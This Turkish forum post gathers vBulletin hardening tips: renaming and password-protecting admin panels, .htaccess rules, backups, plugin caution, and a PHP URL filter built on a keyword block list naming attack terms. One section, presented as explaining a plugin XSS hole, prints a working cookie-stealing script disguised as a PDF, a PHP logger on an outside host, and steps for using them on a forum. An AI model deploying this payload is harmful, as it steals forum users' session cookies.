Sunlara bi bak derim
Daha Önce Bazılarını "burgutex" Hocamın Sorduğu Soruya Cevap Olarak Yazmıştım.
Sonradan Forumumuzda Güvenlik Adına Bir Yazının & Makale'nin Olmadığını Farkettim.
Sistem Güvenliği Konusunda Bilgisi Zayıf Olan Arkadaşların İşine Yarayacağını Umuyorum.
Bilindiği Gibi Hemen Hemen Hergün Bir Çok Siteye İndex Atılıyor ve Erişimi Engelleniyor.
"Sistem Güvenliği" Hakkında Fazla Bilgiye Sahip Olmayan Arkadaşların Siteleride Maalesef Geçici ya da Kalıcı Hasarlar Görebiliyor.
Öncelikle Hosting Firmamızı Seçerken Çok Dikkatli Davranmalıyız
Firmanın Telekom ve Vergi Levhası Kayıtlarını Kontrol Etmeliyiz.
Aldığımız Hizmetin Faturasını Muhakkak Kestirmeliyiz ki İleride Sorun Olduğunda Elinizde Sağlam Bir Kanıt Olsun.
Aldığınız Domainleri Hosting Şirketinde Değil Mümkün Olduğu Kadar Bağımsız Bir Şirkette Tutun.
Kesinlikle FTP'deki Admincp ve Modcp İsimlerini Değiştirip Bunları Şifreleyin.
İsimleri Değiştirdikten sonra "Config.php" nizden Bu Klasör İsimlerini "Değiştirdiğiniz Şekilde" Düzenlemeyi Unutmayın.
Kod:
$config['Misc']['admincpdir'] = 'DEĞİŞTİĞİNİZİSİM'; $config['Misc']['modcpdir'] = 'DEĞİŞTİĞİNİZİSİM'
Daha Sonra Cpanel'inize Girerek Bu Klasorlere Erişim İçin "Password" Koyun.
Yani Admin Şifreniz Çalınsa bile 2.nci bir Güvenlik Şifreniz Olmuş Olacak.
"Cpanel"den Her "Admin" ve "Moderator" İçin Ayrı Kullanıcı Adı ve Şifre Oluşturun!
Biraz Abartalım Ve Admincp nin Yolunu Değiştirdikten Cpanelden Değişik Bir 2.nci Şifre Verdikten sonra Birde 3.cü Şifre Koyalım. "Yuh Artık" dediğinizi Duyar gibiyim
Önceki Şifrelemeleri Her Admin/ Moderatore Ayrı Olarak Oluşturdunuz. Ama bu Şifreleme Genel Bir Şifreleme Olacağından Bütün Adminlere Vermeniz Gerek. Aynı İşlermi Modcp İçinde Uygulayabilirsiniz.
Admincp'ye girin(ya da Adını Ne İle Değiştirdiyseniz Artık)
Ek Üstteki
Kod:
<?php
Altına Ekleyin:
PHP- Kodu:
$ourLogin = "KULLANICIADINIZ";
$ourPassword = "ŞİFRENİZ";
session_start();
if ($_SESSION['login']!=$ourLogin && $_SESSION['password']!=$ourPassword) {
if ($_POST['login']==$ourLogin && $_POST['password']==$ourPassword) {
$_SESSION['login'] = $_POST['login'];
$_SESSION['password'] = $_POST['password'];
header("Location: index.php");
}
else {
echo "
<form action=index.php method=post>
Hoşgeldin Kimsin?:<br>
<input type=text name=login value=''><br>
Peki Şifren:<br>
<input type=password name=password value=''><br>
<input type=submit value=' Tamam '>
</form>
";
exit;
}
}
FTP Deki Gerekli Dosyalar Haricinde (Avatar,Eklenti,Resim Vs..) Diğer Dosyalarınızın CHMOD Ayarlarını Asla 777 Yapmayın.
"Config.php" dosyanızın İçeriğini Şifrelemeniz Gerekir. Yani Sistemize Erişim Sağlansa Bile Database Bilgilerinizi Koruyabilirsiniz.
http://www.Buradan Source Cop İsimli Programı İndirin:
Programı Çalıştırdıktan Sonra "PHP" Seçiin ve Bilgisayarınızda Herhangi Bir Klasor Oluşturup Sitenizde Bulunan config.php yi İçine Atın.
Sonra Programdan "Select Source Folder" Butonuna Basarak Oluşturduğunuz Klasorü Seçip "Encrypt" Butununa Basarak Şifrelemeyi Gerçekleştirin.
Sonra PC'de Oluşan "Scopbin" Dosyası İle Config.php Dosyanızı FTP'ye Geri Atın.
Öncelikle Kendi Admin Hesabınızı Güvenlik Altına Alın. Bunun İçin Config.php Dosyanızı Açın ve Belirrtiğim Yere Kendi Üye İD Numaranızı Yazın.
Kod:
$config['SpecialUsers']['undeletableusers'] = 'BURAYA';
vBulletin ilk Kurulumdan Sonra "İnstall" Klasorunun Adını Değiştirmeyin Komple Silin! İllaki FTP De Tutacaksanız Admin ve Mod Paneline Koyduğunuz Gibi Bu Klasorede Şifre Oluşturun.
Eklenti Kurmadan Önce Ne Eklentisi Olduğuna, Ne İşe Yaradığına, Kim Tarafından Yazıldığına İyi Bakın!! Eğer Fazla Bir Bilginiz Yoksa Eklenti Hakkındaki Son 5 Yorumu Dikkatlice Okuyun. Sorun Olmadığına Kanaat Getirmeden Asla Kurmayın.
Vbulletin.org da Onaylanmamış (yada Hiç Olmayan) ve "Kimliği Belli Olmayan" ve "Güvenmediğiniz Sitelerden" Eklenti İndirip Kurmayın! İçerine Kod Koymuş Olabilirler (Yapanlar ÇOK!!)
Her Önünüze Gelene Admin ve FTP Bilgilerinizi Verip "Bana Yardım ET" Demeyin. Kendilerine Gizli Admin Oluştururlar Sitenize binbir Tane Reklam Atarlar. Ruhunuz Duymaz. Siteniz Belirli Bir Düzeye Ulaştığında Databasenizi Çeker Başkasına Satarlar. Siteniz Büyük Zarar Görür. emekleriniz boşa Gider.Gülüp Geçmeyin. Muhtemel Olaylardır.
FTP ve Admin Şifreleriniz Kesinlikle Basit Şifrelerden İbaret Olmasın.
Yani Sadece Rakam Ya da Sadece Harflerden Oluşmasın. Özellikle FTP Şifreniz Büyük Harf, Küçük Harf,Rakam ve Sembol'lerden Oluşsun..
vBulletin Sahipleri Genelde "Modifikasyon" Sevdiklerinden Bir Çok Eklenti Kurarlar. Ama Hiçbir Zaman Kurdukları Eklentilerin Bir Listesini Tutmaz ya da Onları Yeni Çıkan sürümleri ile Upgrade Etmezler. Upgrade Demek Yanlızca vBulletin Sürümlerini Güncellemek Demek Değildir. Kurduğunuz Eklentilerin'de Yapımcısı Tarafından Güncellenerek Açıklarının Kapatıldığını Unutmayın..
Forumunuzda Veri Kaybını Önlemek İçin Mümkün Olduğu Kadar sık Database Yedeği Alın. Database Yedeklerinizi vBulletindeki Admin Panelden Değil!! PhpMyAdminden Almaya Özen Gösterin. Ayda 1 ya da 2 Kere Kesinlikle FTP'nizdeki Klasorleri Full Olarak PC'nize İndirin. Rarlayın Kaldırın Bi Köşeye Dursun. Ne Zaman Çökeceğiniz Belli Olmaz! Hosting Kapanır Bişey Olur Elinizde Sitenizin Full Yedeğini Mutlaka Bulundurun.
Forumlarınızda Üyelerin HTML Kullanmalarına Kesinlikle izin Vermeyin Gereken Yerden bu Özelliği Deaktif Edin.
Forumunuza Chat Paneli Kurmayın. Kursanız Bile Açığı Olup Olmadığına Dikkat Edin..
Üye Kayıt Panelinde Güvenlik Önlemlerini Kesinlikle Kullanın. Şu Sıralar Reklam Botları Hayli Fazlalaştı.
FTP yada Admin Şifrelerinizi KEsinlikle 3. Şahıslarla Paylaşmayın. Size Yardım Etmesi İçin Paylaşmak Zorunda Kalsanız Bile 3. Şahısın Sistemden Çıkışının Ardından;
Admincp'den Log Kayıtlarına Bakın. Ne Değiştirmiş Hangi Bölümlere Girmiş İnceleyin.
Administrator Grubunda Tanımadığınız Bir nick Olup Olmadığını Kontrol Edin.
Sisteminize Herhangi bir Reklam Kodu Konulp Konulmadığını Kontrol Edin.
Üyelerinizin Sitenize Girerken Herhangi bir Siteye Ping Göndermediğinden Emin Olun.
Eğer FTP Şifrenizi Verdiyseniz config.php'ye Süper Admin eklenmediğinden Emin Olun.Zaten FTP Şifrenizide Kimseye Vermeyin Gereken Dosyayı Siz Upload Edin.
Şahsi Bilgisayarınız Haricinde Başka PC'lerden FTP ya da Admin Kullanıcı Hesabınızı Açmayınız. Genellikle Cafe'lerde Keylogger Kurulma İhtimali Yüksek Olduğundan Siz Evinize Gidene Kadar Siteniz Çoktan heklenmiş Olabilir. Ayrıca Kişisel Pc'nize Kesinlikle Antivirüs/Firewall Programları Kurulu ve Güncel Olsun.
Hostunuzla İletişimde Kullandığınız Mail Ayrı, Admin Nickinizde Kullandığınız Mail Ayrı Olsun!! Ve Bu Mailleri Kimseye Bildirmeyin. Profil Ayarlarınızdan Mail Adresinizi Gizli Olarak Ayarlayın. Mailinizi "admin@siteadı" Şeklinde Kullanmamaya Özen Gösterin. "Destek@" ya da "iletişim@" gibi Mailleriniz de Kesinlikle Kota Limiti Koyun. Boşu Boşuna BW Harcamamış Olursunuz.
Domain bilgileriniz gizli Olsun "Whois" Çekildiğinde Kullandığınız mail Adresi ve İletişim Bilgileriniz Görülmesin..
FTP Programında Seçici Olun. krack'lı Programları Kullanmayın. İçlerine Kod Konmuş Olma İhtimali Hayli Yüksek. Ya Programı Gerçek Yapımcısından Satın Atın Yada FileZilla gibi Ücretsiz Programlar Kullanın.
Bir Çok Sitede Güvenlik için includes/classcore.php yolunu Değiştirin Yazar. Yötem Doğrudur Fakat vBulletin Kaynak kodlarıyla Oynadığınızdan Lisansınız İptal Edilebilir. bu İşlemi Uygulamamanızı Tavsiye Ediyorum. Hem Zaten Yukarıdaki İşlemlerimizde config.php Dosyasının İçeriğini Şifrelediğimizden Ayrıyeten Dosya Yolunu Değiştirip Risk Almak Gereksiz Olur.
Botların Gelmemesi ve Forumunuzda Reklam Yapamaması İçin Üye Kayıtlarında CAPTCHA ya da reCAPTCHA ve Extradan Soru / Cevap Şeklinde Engeller Koyun. Bunu Önemseseniz İyi Olur, Genelde Gece Gelirler Sabah Kötü Sürprizlerle Karşılaşabilirsiniz.
Bu Kısım Forumlarda Dolaşırken Gördüğüm"Pislick" Nickli Arkadaşın Paylaştığı Benimde Arşivime Aldığım Bir Konudur.
Faydaları / Zararları Konusunda %100 Garanti Veremem, Fakat Mantıklı Geldiğinden Paylaşma İhtiyacı Hissettim.
Kod:
PHP ile URL kontrolü freni: Özgün bir düşünce
Vbulletin'in header.php dosyasına Stiller-Temalar > Temaları Düzenle> header bölümünden ulaşın. Dosyanın üst kısmında url kontrolüyapabileceğiniz ve kendinize göre geliştirebileceğiniz aşağıdaki fikrikullanabilirsiniz. Bu kodu eğer SEF, url rewrite kullanıyorsanız kullanmayın veya kendinize göre değiştirin.
<?php
$frenle=$_SERVER['REQUEST_URI'];
//Aşağıdaki if deyimiyle eğer url satırı 55 karakterden uzunsa -Urltabanlı exploitlerin bir çoğu bu değerden uzundur.- diğer satırlarageçmeyi durduruyor. Eğer SEF, url rewrite yapmıyorsanız bu kod ile çoğuURL tabanlı saldırının önüne geçebilirsiniz.
if (strlen($frenle)>=65) {
exit;
}
// Aşağıdaki kod ise eğer url bölümünüzde istenmeyen bir karakter,bölüm varsa çalışmayı durdurmaktadır. Bu da henüz çıkmamış, duyrulmamışurl tabanlı açıkların bile önüne geçmenizi sağlayabilir. $bnd1,2,3,4...alanlarını çoğaltarak kendinize göre zenginleştirebilirsiniz. Anlaşılırolması açısından değerler tek tek yazılmış ve döngüye sokulmuştur.
$frenle=strtolower($frenle);
$bnd1=strpos($frenle, "tool");
$bnd2=strpos($frenle, "******");
$bnd3=strpos($frenle, "redire");
$bnd4=strpos($frenle, "location");
$bnd5=strpos($frenle, "script");
$bnd6=strpos($frenle, "html");
$bnd7=strpos($frenle, "include");
$bnd8=strpos($frenle, "insert");
$bnd9=strpos($frenle, "*delet*e*");
$bnd10=strpos($frenle, "exit");
$bnd11=strpos($frenle, '//');
$bnd12=strpos($frenle, 'where');
$bnd13=strpos($frenle, 'vb_login');
$bnd14=strpos($frenle, 'xss');
$bnd15=strpos($frenle, 'echo');
$bnd16=strpos($frenle, 'die');
$bnd17=strpos($frenle, 'command');
$bnd18=strpos($frenle, 'cookie');
$bnd19=strpos($frenle, 'cmd');
$bnd20=strpos($frenle, '_md5');
//yukarıda tanımladığımız 11 kural için bir ihlal yakalanmışsaihlali yapan kişi karşısında echo ile belirtilmiş iletiyi görecek veorada kalacaktır.
if (($bnd1== true) or ($bnd2== true) or ($bnd3== true) or ($bnd4==true) or ($bnd5== true) or ($bnd6== true) or ($bnd7== true) or ($bnd8==true) or ($bnd9== true) or ($bnd10== true)or ($bnd11== true)or($bnd12== true)or ($bnd13== true)or ($bnd14== true)or ($bnd15== true)or($bnd16== true)or ($bnd17== true)or ($bnd18== true) or ($bnd19== true)or ($bnd20== true)) {
echo 'Zararlı olabilecek Url durduruldu! Lütfen kullandığınız Urlye dikkat ediniz.';
exit; }
?>
Sisteminizde Yukarıda Anlatmış Olduğum Önlemleri Alarak
Sitenizin Şuanki Halinden Çok çok Daha Verimli Bir Güvenlik Kalkanı Oluşturabilirsiniz.
Unutmayın Ne Kadar Önlem Alırsanız Alın İçine Kod Yüklenmiş Bir Eklentiyi Kurduğunuzda
Bunların Bir Anlamı Olmayacaktır.
Onun İçin Güvenmediğiniz Kişilerin Eklentilerini Kurmamanızı Şiddetle Tavsiye Ediyoruz.
Yeni Güvenlik Önlemleri Alınması Gerektiğinde Konu Güncellenecektir.
Kaynak:iMpAcK
2-----------------------------------------------------
Database Bilgilerini Gizli Tutma Yöntemleri
.htaccess dosyaniza Aşağidaki Kodu Ekleyin.
Bu Kod ne İşe Yarıyor Derseniz. Mesela 30 Kişilik Bir serverdasiniz.
Adam Server a girdi bir siteden CGI Telnet Atti ve Kullanıcı adlarini cekti .
Ordan sizin sitenizin db bilgilerini cekmeye calısıcak. Varsayalım siz
vbulletin forum kullanıyorsunuz ve config bilgilerinizde /includes/config.php de yer alıyor .
o zaman includesin icine girip bir .htaccess olusturuyorsunuz ve icine kodu yapistiriyorsunuz.
Kod:
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /config.php [L]
Ayrica diğer phplerinizide boyle erişime engelleyebilirsiniz.
Bunu yaparsanız adam serverdan db bilgilerinizi cekemez.
Vbulletin Admincp Ve Modcpnin isimlerini değiştirmek..
heker saldırılarına karşı forumunuzu korumak için bir yöntemde AdminCP ve Modcp dizin adlarını değiştirmektir. admin dizini /forum/admincp/ ve mod dizinide /forum/modcp/ olarak açılmıştır. Bu dizin adlarını ftp kullanarak değiştirin. Örneğin admincp dizinizi /forum/birincicp/ modcp dizininizide /forum/ikincicp/ olarak değiştirin.
Değişiklikler yaptıkdan sonra config.php dosyasını açıp;
PHP Kodu:
$config['Misc']['admincpdir'] = admincp;
$config['Misc']['modcpdir'] = modcp;
olan bölümlerdeki admincp ve modcp dizin adlarını yeni dizin adınıza göre düzenleyin. Örneğin;
PHP Kodu:
$config['Misc']['admincpdir'] = birincicp;
$config['Misc']['modcpdir'] = ikincicp;
Bu yöntem ilede forumunuzu korumuş olursunuz.
Vbulletinde Güvenlik Önlemleri Config.php nin Yerini Değiştirmek
Vbulletin Scripti Kullanıyorsaniz güvenlik Önlemi icin bir kac Yöntemden Bahsediceğim.
Öncelikle FTP nin ana dizinine gelip seocu diye Bir klasor acalım.
Sonra includes in icine girip config.php yi masaustune atalım . Masa ustune attıgımız config.php nin adini hadibe.php koyalim . sonra includes in icinden config.php yi silelim . sonra tekrar includes in icindeki class_core.php ye sağ tıklayip düzenle diyelim ve nodpad ile actıgımız class_core.php nin icinde
CTRL + H Yaparak Aranan Yerine includes/config.php yazalım .
Yeni Değer Yazan Yere ise Seocu/hadibe.php Yapalım ve Tümünü Değiştir dedikten sonra Kaydetip Kapatalım .
Sonra Sitemizin anasayfasına gelıp F5 Yapalım eğer normal calısıyorsa config.php nin yerını değiştirmişsinizdir. Fakat Database Hatasi Veriyorsa Değiştirememişsinizdir. Gayet Yapılmasi Basit Bir Önlem.
3-------------------------------------------------------------
1. Bildiğiniz hek Kodlarını Sansürleme
Admincp-->vBulletin Seçenekler-->Sansürleme Seçenekleri-->
Censorship Enabled = Evet diyoruz
Character to Replace Censored Words = Yazılan kod yerine yazılacak cümle bende ( Kod koruması devrede) yazıyor
Censored Words bölümüne sansürleme yapmak istediğiniz tüm kodları yazabilirsiniz.
2. Güvenlik Kalkanı Script Kodları Engeller
Güvenlik Kalkanı
Bu hek forum hekleme için kullanılan bir çok tehliklei scriptleri önlüyor hemde daha database ulaşmadan önlüyor.
Kurulumu kısa zaman alır
1- Elog dosyasını servera yükleyin (kök dizine)
2- Counter.txt ve logfile_injects.txt icin CHMOD 666 yapın.
3- Admincp/Ürün Yöneticisinden *****erTracker102-product.xmlimport edin.
Çalıştığını kontrol etmek için.
www.siteadi.com/index.php?fopen çalıştırın.
http://www.vbulletin.org/forum/showthread.php?t=110030
TopX Açığını Kapatın ( Bir çok topx'te mevcut )
Açığı kapatmak için
Admincp-->Stiller & Temalar-->Stil Yöneticisi-->Temaları Düzenle-->topXstats_thread_bit templatesine girin ve tüm içeriği şu kodla değiştirin.
Kod:
<tr>
td nowrap="nowrap"><div class="smallfont"><strong>$newpostprefix$oldpostprefix <a href="showthread.php?$session[sessionurl]goto=newpost&t=$getstats_thread[threadid]">$getstats_thread[titletrimmed]
<td colspan=3" align="left" nowrap="nowrap">$vbphrase[thread_deleted_by_x]
$getstats_thread[musername]
[color="][/color]
[color="]$getstats_thread[views]
[color="] [/color]
[color="]
[color="[/color]]$getstats_thread[replycount][/color]
[color="]
[color="[/color]] [/color]
[color="]**
[color="[/color]][/color]
[/color]
GENEL BİLGİLER
Burada forumunuzu en yüksek güvenlik seviyesinde tutmanız için gereken TEMEL şeyleri sıralıyorum. Eminim profesyonel VBulletin kullanıcıları aşağıda sıralayacaklarımı biliyorlardır ama VB'ye yeni başlayanların pek bildiklerini söyleyemeyeceğim. Tabii ki heklenemez diye bir şey söz konusu değil ama aşağıdaki şeyleri uygularsanız forumunuz %80 daha güvenli olacaktır.
1-) Forumunuzu daima en yüksek sürümlere upgrade edin.
2-) Hiç bir hek ve plugin yüklemeyin (Özellikle PHP dosyalarından değişiklik yapılanları). Tertemiz bir VBulletini heklemek neredeyse imkansızdır. Oluşan açıklar genelde yaptığınız eklentilerden ve hostunuzdan kaynaklanır.
3-) Admin ve mod kontrol panellerinin şifrelerini koruyun. Ayrıntılı (İngilizce) açıklamaya buradan ulaşabilirsiniz.
4-) Tools.php dosyasının (vB3) websitenizde bulunmadığından emin olun. Bu dosya kesinlikle upload edilmemelidir. İşi bittikten sonra silinmelidir.
5-) phpMyAdmin kullanıyorsanız giriş kısmının şifrelendiğinden emin olun. Aksi taktirde herkes ulaşabilir.
6-) Herhangi bir saldırıdan sonra tüm cpanel FTP ve admin şifrelerinizi değiştirin.
7-) Admin ve mod şifrelerinin en az 9-10 karakter olmasına bu karakterlerin sayı ve harflerden oluşmasına dikkat edin. Şifreleriniz MD5 şeklinde şifrelendiği için hem harf hemde rakamla oluşan 10 karakterli bir şifrenin çözülmesi imkasız bile olabilir.
FORUMUNUZDA ASLA HTML KULLANIMINA İZİN VERMEYİN.
9-) Forumunuzu kurduktan sonra install klasörünüdeki install.php ve upgrade1.php adlı dosyaları silin.
10-) Sitenizi sağlam hostlara kurun. Forumunuz ne kadar güvenli olursa olsun hostunuz saldırı yediği zaman sizde etkileneceksiniz.
11-) Sık sık DATABASE yedeği alın.
4--------------------------------------------------------------
Gelelim eklentiden do&l240;an xss açığına
Notepad ile yeni bir dosya açıp aşağıdaki kodu içine yapıştırın ve testmagic.pdf olarak kaydedin.
Code:
<script>
d o c u m e n t.write(&l039;<img src="http://host adresiniz/c.php?c=&l039;+document.cookie +&l039;" WIDTH=0 HEIGHT=0>&l039;
document.location.href="https://www.google.com/adsense/testmagic.pdf";
</script>
A&l254;a&l240;&l253;dakini de c.php olarak kaydedip bir host a at&l253;n.
Code:
<?php
&l036;cookie = &l036;_GET[&l039;c&l039;];
&l036;ip = getenv (&l039;REMOTE_ADDR&l039;
&l036;date=date("m/d/Y g:i:s a");
&l036;referer= getenv (&l039;HTTP_REFERER&l039;
&l036;fl = fopen(&l039;megalog.txt&l039;, &l039;a&l039;
fwrite(&l036;fl, "&l92;n".&l036;ip.&l039; :: &l039;.&l036;date."&l92;n".&l0 36;referer."&l92; n". &l036;cookie."&l92;n");
fclose(&l036;fl);
?>
Nas&l253;l kullan&l253;laca&l240;&l253;na geçelim :
vbulletin 3.5.4 kullanan bir foruma üye olup mesajımızı yazıyoruz. daha sonra yazdığımız mesaja testmagic.pdf i ekliyoruz. eğer o sitede açık varsa mesajı gören kullanıcıların cookie si hostunuzdaki log.txt e kaydedilecek.
Kodlardaki bazı adresler yerine biliyorsunuz ki kendi adreslerinizi yazacaksınız.Bu açık sadece IE kullananlarda geçerlidir.
işte eklentiden doğan xss açığı böyle kapatmak için pdf türü eklentiyi silmelisiniz
edit:1--------------------------------------------------------------
htaccess ile vbulletin koruma .
htaccess iLe DoSya ŞifreLeme
.htaccess DoSyaSı iLe admincp 'yi $ifreLeyebiLiriz... A$aqıda Bunun AnLatımını GöreCekSiniz...
Adım 1
ÖnCeLikLe .htaccess DoSyaSı oLu$turun... Içeriqine Bunu EkLeyin,
AuthType Basic
AuthName "Klasör Açıklamasını Buraya Yazın"
AuthUserFile /var/www/vhosts/SiteAdı.com/httpdocs/$ifreLeneCek Sayfa/.htpasswd
<Limit GET>
require valid-user
</Limit>
SiteAdı.com Yerine Kendi Sitenizin Adını Yazın...
$ifreLeneCek Sayfa KıSmına admincp Yazıyoruz... Eqer Forumumuz Forum kLaSörü IçeriSine KuruLuySa; forum/admincp Yazıyoruz...
Adım 2
.htpasswd Adında Bir DoSya oLu$turun...
Burdaki Siteye Girerek Name (iSim), PaSsword ($ifre) KıSımLarını DoLdurun... Ve HiqhLiqht Code 'ye TıkLayın...
Sitenin Verdiqi Kodu .htpasswd IçeriSine Atın ve Kaydedin...
Daha Sonra .htaccess ve .htpasswd DoSyaLarını $ifreLemek iStediqiniz Dizine Atın... Yani admincp kLaSörüne Atın...
I$Lem Tamamdır...
alıntı: FreddyKrueger
edit: 2---------------------------------------------------------------
vBuLLetin YönLendirme Yememek iCin SanSürLü KeLimeLer vBulletin Güvenlik
Bu konuda cok mesaj yazildi cizildi. Bende bu mesajlardaki kodlari ve kendiminde eklemis oldugu sansurlu kelimeleri bir metin belgesine kaydederek siz uyelerimiz ile paylasayim dedim.
Yapmaniz gereken
Vbulletin Ayarlari > Sansurlu kelimeler
Bu bolgedeki sansurlu kelimelerin icine metin belgesindeki kodlari eklemek.
heksiz yonlendirmesiz keyifli forumlar dilegimle.
Download
